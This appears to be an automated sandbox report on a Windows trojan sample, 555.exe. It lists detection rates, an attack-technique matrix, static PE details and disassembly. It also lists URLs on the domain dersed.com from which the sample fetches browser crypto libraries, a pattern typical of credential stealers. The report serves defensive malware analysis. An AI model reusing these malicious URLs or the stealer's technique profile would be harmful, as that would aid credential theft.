Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	2 Obfuscated Files or Information	NTDS	31 Security Software Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	1 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 Virtualization/Sandbox Evasion	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 Account Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	1 Remote System Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	2 File and Directory Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	Rename System Utilities	Keylogging	26 System Information Discovery	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
555.exe	71%	Virustotal		Browse
555.exe	41%	Metadefender		Browse
555.exe	79%	ReversingLabs	Win32.Trojan.Graftor
555.exe	100%	Avira	HEUR/AGEN.1206114

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.555.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1206114	Download File
3.2.555.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1210209	Download File
0.0.555.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1206114	Download File
0.2.555.exe.712ed8.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
dersed.com	4%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://dersed.com/freebl3.dll	5%	Virustotal		Browse
http://dersed.com/freebl3.dll	0%	Avira URL Cloud	safe
http://dersed.com/nss3.dllv	0%	Avira URL Cloud	safe
http://dersed.com/vcruntime140.dllbg	0%	Avira URL Cloud	safe
http://dersed.com/288	0%	Avira URL Cloud	safe
http://dersed.com/vcruntime140.dll	0%	Avira URL Cloud	safe
http://dersed.com/softokn3.dllUD	0%	Avira URL Cloud	safe
http://dersed.com/vcruntime140.dll_i	0%	Avira URL Cloud	safe
http://dersed.com/msvcp140.dllGD	0%	Avira URL Cloud	safe
http://dersed.com/softokn3.dllmb	0%	Avira URL Cloud	safe
http://dersed.com/msvcp140.dll	0%	Avira URL Cloud	safe
http://dersed.com/nss3.dll	0%	Avira URL Cloud	safe
http://dersed.com/mozglue.dll	0%	Avira URL Cloud	safe
http://dersed.com/softokn3.dllLD	0%	Avira URL Cloud	safe
http://dersed.com/freebl3.dllyD	0%	Avira URL Cloud	safe
http://dersed.com/mozglue.dllkD	0%	Avira URL Cloud	safe
http://dersed.com/nss3.dllcom/freebl3.dll	0%	Avira URL Cloud	safe
http://dersed.com/softokn3.dll	0%	Avira URL Cloud	safe
http://dersed.com/vcruntime140.dllGc	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
dersed.com	unknown	unknown	false	4%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://dersed.com/freebl3.dll	555.exe, 00000003.00000002.317565007.0000000000836000.00000004.00000020.00020000.00000000.sdmp	true	5%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://dersed.com/nss3.dllv	555.exe, 00000003.00000002.317520983.00000000007E7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://dersed.com/vcruntime140.dllbg	555.exe, 00000003.00000002.317555951.0000000000826000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://dersed.com/288	555.exe, 00000003.00000002.317520983.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, 555.exe, 00000003.00000002.317555951.0000000000826000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://dersed.com/vcruntime140.dll	555.exe, 00000003.00000002.317555951.0000000000826000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://dersed.com/softokn3.dllUD	555.exe, 00000003.00000002.317565007.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://dersed.com/vcruntime140.dll_i	555.exe, 00000003.00000002.317555951.0000000000826000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://dersed.com/msvcp140.dllGD	555.exe, 00000003.00000002.317565007.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://dersed.com/softokn3.dllmb	555.exe, 00000003.00000002.317555951.0000000000826000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://dersed.com/msvcp140.dll	555.exe, 00000003.00000002.317565007.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://dersed.com/nss3.dll	555.exe, 00000003.00000002.317520983.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, 555.exe, 00000003.00000002.317555951.0000000000826000.00000004.00000020.00020000.00000000.sdmp, 555.exe, 00000003.00000002.317565007.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://dersed.com/mozglue.dll	555.exe, 00000003.00000002.317565007.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://dersed.com/softokn3.dllLD	555.exe, 00000003.00000002.317565007.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://dersed.com/freebl3.dllyD	555.exe, 00000003.00000002.317565007.0000000000836000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://dersed.com/mozglue.dllkD	555.exe, 00000003.00000002.317565007.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://dersed.com/nss3.dllcom/freebl3.dll	555.exe, 00000003.00000002.317565007.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ip-api.com/line/	555.exe, 00000003.00000000.288286831.0000000000400000.00000004.00000001.01000000.00000003.sdmp	false		high
http://dersed.com/softokn3.dll	555.exe, 00000003.00000002.317555951.0000000000826000.00000004.00000020.00020000.00000000.sdmp, 555.exe, 00000003.00000002.317565007.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://dersed.com/vcruntime140.dllGc	555.exe, 00000003.00000002.317555951.0000000000826000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	594633
Start date and time:	2022-03-22 22:51:33 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	555.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal96.troj.spyw.evad.winEXE@4/4@7/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 96% (good quality ratio 85.8%) Quality average: 70.5% Quality standard deviation: 33.1%
HCA Information:	Successful, ratio: 98% Number of executed functions: 52 Number of non-executed functions: 258
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.189.173.20, 20.54.110.249
Excluded domains from analysis (whitelisted): fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, onedsblobprdwus15.westus.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
23:53:15	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_555.exe_73a2317c9b18c06fb4572ea77cd525ee3f28dbd_69550887_1ab655c1\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9430986111528993
Encrypted:	false
SSDEEP:	192:M2AFk0lk4YHBUZMXojAK3Yw/u7shS274Itx:QPlk9BUZMXojL/u7shX4Itx
MD5:	9B8FC50DD0D29F54F499621D50C8AD62
SHA1:	1273BFD6929FB2B4CA4874A792AE69816B1E2F11
SHA-256:	9655AA68E28BDC15B2CBB4DAA13850F1A086D82D45FF56F78C3FEEE8A0CBF803
SHA-512:	BFC071EAB661547CB0BD88D00ECBBEF817CF30CF4A9ACBCAEFF1BFB1569075424335948962E71C07F5360BC53316DCF1687D9CF46278F62EC1F89128B49EAE95
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.2.4.6.3.1.8.9.2.9.4.5.4.9.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.2.4.6.3.1.9.4.0.4.4.5.0.0.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.f.b.1.4.f.5.b.-.8.2.8.0.-.4.5.a.e.-.b.e.e.9.-.7.5.f.a.d.4.b.7.9.6.4.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.d.2.3.d.f.d.7.-.1.7.0.6.-.4.7.b.5.-.9.3.4.9.-.d.c.5.f.9.a.f.9.a.e.2.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.5.5.5...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.2.c.-.0.0.0.1.-.0.0.1.c.-.7.9.3.2.-.0.8.9.4.3.f.3.e.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.d.f.1.3.d.4.1.7.b.e.7.e.f.d.1.d.6.5.0.9.b.f.e.9.4.7.4.8.5.3.9.0.0.0.0.0.9.0.4.!.0.0.0.0.0.a.5.5.9.e.b.f.6.a.b.1.c.d.f.2.9.2.c.7.9.a.a.c.5.a.c.2.0.c.2.3.6.d.9.7.5.e.b.7.!.5.5.5...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.9././.0.9././.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3D28.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Mar 22 22:53:11 2022, 0x1205a4 type
Category:	dropped
Size (bytes):	92494
Entropy (8bit):	1.9553236387916726
Encrypted:	false
SSDEEP:	384:HvVcEVMCcx960PIEQUnVT9sEQOeYBF+D+2IYBO:HyChQI5gVKE4YBF+x6
MD5:	87D9B100A994FF000B5C06267BE0226D
SHA1:	46D41AFA9086777230CB38F7F957024E34F57815
SHA-256:	258E97FE2FC99EE493D3F78937B42C864BBA2654D5348A464FC129E83F464970
SHA-512:	F4CE8D98D9AF8FAF155BDBC3BB62E35D74B558465F79D520ACB009747F669CC50CEE20772B0DC326E96AA5DA322DAC4808831FAA4C8598D48AF45EADC96EDA73
Malicious:	false
Reputation:	low
Preview:	MDMP....... .......WS:b.........................................D..........T.......8...........T...........x....:...........................................................................................U...........B...... ......GenuineIntelW...........T.......,...KS:b.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER497D.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8234
Entropy (8bit):	3.688431082756376
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiWN6Irwt6Yei6DgmfhhS8+pr589bWTsf0Oym:RrlsNi06IrS6Yj6DgmfnSGW4fv
MD5:	CDE05209CC74B1005E7AD76327AA3173
SHA1:	651DF6AA11E2B4F6CDF1E21A1228A0FF68CD0743
SHA-256:	ABB9D8C4C33EEC5B9D10B346747AE37C70F8F58CCDC7D12984A467C0A4AE4531
SHA-512:	19AB7546E950373EC778423E45C2D08718D9C5525182D14F42CC2F2082A10247515AE4728541736B8453A7B3A277DAA4602BC77E0B15C60C65C9D3F9CE33C0E9
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.4.4.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4E21.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4522
Entropy (8bit):	4.423325556237254
Encrypted:	false
SSDEEP:	48:cvIwSD8zskJgtWI9NJWgc8sqYjK8fm8M4J61RF3I+q8mbwhHXSrxd:uITfia4grsqYrJ69I/wxSrxd
MD5:	68930925340EA9386F5C57115BC56C4A
SHA1:	21FFD5E3BDD640870D896B69AB35C588364B5611
SHA-256:	F6AA5BD71759921218656247A52D2CE89A6BA9F53F4AFB7BBB1A79E45A369E5D
SHA-512:	7E78820E9C2427F020176D43CFBCF73E6785E7E67E08F79EB317E69493D27D63E2F2FE8915B02117097B95A46F350C56177A81DBDA067472424BBC72CD7663E5
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1439043" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.692192927991023
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	555.exe
File size:	1304576
MD5:	ed37ebbe1746dd0d566c8c4769655e0b
SHA1:	0a559ebf6ab1cdf292c79aac5ac20c236d975eb7
SHA256:	b4c9aadd18c1b6f613bf9d6db71dcc010bbdfe8b770b4084eeb7d5c77d95f180
SHA512:	aed30ae2e22ded5374f56062cdbcc2a72edea1d727e7fd0624e627f363d18787d5ce4334066b76b23d10e0a2c0169f06e5d6a8f05037d0943bfea110ee805060
SSDEEP:	24576:atLyuIJLGWVpPq48nuzldzB2sZL7kHNWDzBHc6ewxl:KLgFGYq48nupdzB2sp7kHNW51eE
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y.....H...H...H..iH...H..]Hc..H.`tH...H.`dH...H...H...H..\H...H..mH...H..jH...HRich...H........................PE..L...t.q]...

File Icon


Icon Hash:	18f0f8d2f2e4f206

Static PE Info

General

Entrypoint:	0x424e16
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:	0x5D710174 [Thu Sep 5 12:37:08 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	5f3146513f84438aa6d693baf35ebf34

Entrypoint Preview

Instruction
call 00007FAC08A60E69h
jmp 00007FAC08A5841Eh
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
test eax, eax
je 00007FAC08A585A4h
sub eax, 08h
cmp dword ptr [eax], 0000DDDDh
jne 00007FAC08A58599h
push eax
call 00007FAC08A56352h
pop ecx
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
sub esp, 10h
mov eax, dword ptr [004608E0h]
xor eax, ebp
mov dword ptr [ebp-04h], eax
mov edx, dword ptr [ebp+18h]
push ebx
xor ebx, ebx
push esi
push edi
cmp edx, ebx
jle 00007FAC08A585B1h
mov eax, dword ptr [ebp+14h]
mov ecx, edx
dec ecx
cmp byte ptr [eax], bl
je 00007FAC08A5859Ah
inc eax
cmp ecx, ebx
jne 00007FAC08A58588h
or ecx, FFFFFFFFh
mov eax, edx
sub eax, ecx
dec eax
cmp eax, edx
jnl 00007FAC08A58593h
inc eax
mov dword ptr [ebp+18h], eax
mov dword ptr [ebp-08h], ebx
cmp dword ptr [ebp+24h], ebx
jne 00007FAC08A5859Dh
mov eax, dword ptr [ebp+08h]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax+04h]
mov dword ptr [ebp+24h], eax
mov esi, dword ptr [00451204h]
xor eax, eax
cmp dword ptr [ebp+28h], ebx
push ebx
push ebx
push dword ptr [ebp+18h]
setne al
push dword ptr [ebp+14h]
lea eax, dword ptr [00000001h+eax*8]
push eax
push dword ptr [ebp+24h]
call esi
mov edi, eax
mov dword ptr [ebp-10h], edi
cmp edi, ebx
jne 00007FAC08A58599h
xor eax, eax
jmp 00007FAC08A586E7h
jle 00007FAC08A585D5h
push FFFFFFE0h
xor edx, edx
pop eax
div edi
cmp eax, 02h
jc 00007FAC08A585C9h
lea eax, dword ptr [edi+edi+08h]
cmp eax, 00000400h
jnbe 00007FAC08A585A5h
call 00007FAC08A58644h

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[LNK] VS2010 SP1 build 40219
[ASM] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[ C ] VS2010 SP1 build 40219
[C++] VS2010 SP1 build 40219
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5e954	0x12c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x66000	0xdd458	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x57690	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x51000	0x364	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4f7d9	0x4f800	False	0.48689010908	data	6.55171601636	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x51000	0xeca4	0xee00	False	0.418723739496	data	5.42402682187	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x60000	0x58c4	0x2800	False	0.26943359375	data	4.43475879322	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x66000	0xdd458	0xdd600	False	0.962993188876	data	7.93995191617	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
AFX	0x6673c	0x10218	data	English	United States
CUSTOM	0x76954	0x36f3e	data	English	United States
RCDATA	0xad894	0x894ac	data	English	United States
RT_ICON	0x136d40	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0	English	United States
RT_ICON	0x13af68	0x25a8	dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0	English	United States
RT_ICON	0x13d510	0x10a8	dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0	English	United States
RT_ICON	0x13e5b8	0x988	data	English	United States
RT_ICON	0x13ef40	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_DIALOG	0x13f3a8	0x70	data	English	United States
RT_DIALOG	0x13f418	0x224	data	English	United States
RT_DIALOG	0x13f63c	0x390	data	English	United States
RT_DIALOG	0x13f9cc	0x172	data	English	United States
RT_DIALOG	0x13fb40	0xe2	data	English	United States
RT_DIALOG	0x13fc24	0xf8	data	English	United States
RT_DIALOG	0x13fd1c	0x24c	data	English	United States
RT_STRING	0x13ff68	0xb98	data	English	United States
RT_STRING	0x140b00	0x2a	data	English	United States
RT_STRING	0x140b2c	0x1a4	data	English	United States
RT_STRING	0x140cd0	0xda	data	English	United States
RT_STRING	0x140dac	0x384	data	English	United States
RT_STRING	0x141130	0x38c	data	English	United States
RT_STRING	0x1414bc	0x140	data	English	United States
RT_STRING	0x1415fc	0x71c	data	English	United States
RT_STRING	0x141d18	0x638	data	English	United States
RT_STRING	0x142350	0xe8	data	English	United States
RT_STRING	0x142438	0x4a8	data	English	United States
RT_STRING	0x1428e0	0x38c	data	English	United States
RT_STRING	0x142c6c	0x62	data	English	United States
RT_STRING	0x142cd0	0x13c	data	English	United States
RT_STRING	0x142e0c	0x3a	data	English	United States
RT_GROUP_ICON	0x142e48	0x4c	data	English	United States
RT_VERSION	0x142e94	0x338	data	English	United States
RT_MANIFEST	0x1431cc	0x28a	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	GetTimeFormatA, GetProcessHeap, SetEndOfFile, CreateFileW, SetEnvironmentVariableA, CompareStringW, SetStdHandle, WriteConsoleW, LoadLibraryW, IsValidLocale, EnumSystemLocalesA, GetLocaleInfoA, GetUserDefaultLCID, HeapReAlloc, GetLocaleInfoW, GetStringTypeW, GetSystemTimeAsFileTime, GetCurrentProcessId, GetTickCount, GetDateFormatA, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetModuleFileNameA, GetModuleFileNameW, FlushFileBuffers, GetConsoleMode, GetConsoleCP, GetFileType, InitializeCriticalSectionAndSpinCount, lstrlenW, SetHandleCount, HeapSize, IsValidCodePage, GetOEMCP, GetACP, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetTempPathA, GetTempFileNameA, GetFinalPathNameByHandleA, GetLastError, CreateFileA, GetFileSize, SetFilePointer, ReadFile, CloseHandle, lstrcpyW, GetCurrentDirectoryW, VirtualQuery, QueryPerformanceCounter, lstrcpyA, WideCharToMultiByte, MulDiv, GlobalAlloc, ExitProcess, SizeofResource, LoadResource, LockResource, GetCurrentThreadId, SetLastError, GetModuleHandleW, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, HeapCreate, IsProcessorFeaturePresent, HeapAlloc, GetCPInfo, LCMapStringW, GetTimeZoneInformation, GetStartupInfoW, HeapSetInformation, GetCommandLineA, RtlUnwind, RaiseException, FindResourceA, LoadLibraryA, HeapFree, DecodePointer, EncodePointer, GetProcAddress, WriteFile, lstrcatA, GetLocalTime, GetTimeFormatW, GetDateFormatW, GetStdHandle, GetModuleHandleA, LeaveCriticalSection, EnterCriticalSection, DeleteCriticalSection, InitializeCriticalSection, Sleep, 